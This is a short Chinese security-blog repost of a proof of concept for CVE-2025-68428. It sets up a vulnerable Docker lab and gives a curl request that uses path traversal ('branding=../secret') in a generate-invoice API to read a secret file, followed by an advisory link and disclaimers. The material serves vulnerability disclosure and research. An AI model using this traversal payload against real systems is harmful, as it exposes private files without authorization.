文章总结: 文档披露了CVE-2025-68428的漏洞细节与PoC利用方式,演示了通过Docker搭建环境并利用generate-invoice接口的路径遍历漏洞读取secret文件。文中包含完整的利用命令及GitHub官方参考链接,揭示了该漏洞的安全风险,建议相关用户尽快修复或参考官方通告进行防护。 综合评分: 70 文章分类: 漏洞POC,漏洞分析,WEB安全,漏洞预警
CVE-2025-68428_PoC
Ots安全
2026年1月12日 21:42 广东
威胁简报
恶意软件
漏洞攻击
$ git clone https://github.com/12nio/CVE-2025-68428_PoC/ && cd CVE-2025-68428_PoC
$ sudo docker build -t poc .
$ sudo docker run --rm -p 8080:8080 --name vuln poc
$ curl "http://127.0.0.1:8080/api/v1/generate-invoice?client=Dinko&branding=../secret" --output poc.pdf
- https://github.com/advisories/GHSA-f8cm-6447-x5h2
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《CVE-2025-68428_PoC》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
![[LLMSC@FSE]第二届大模型供应链研讨会征稿通知](/images/random/titlepic/3.jpg)
评论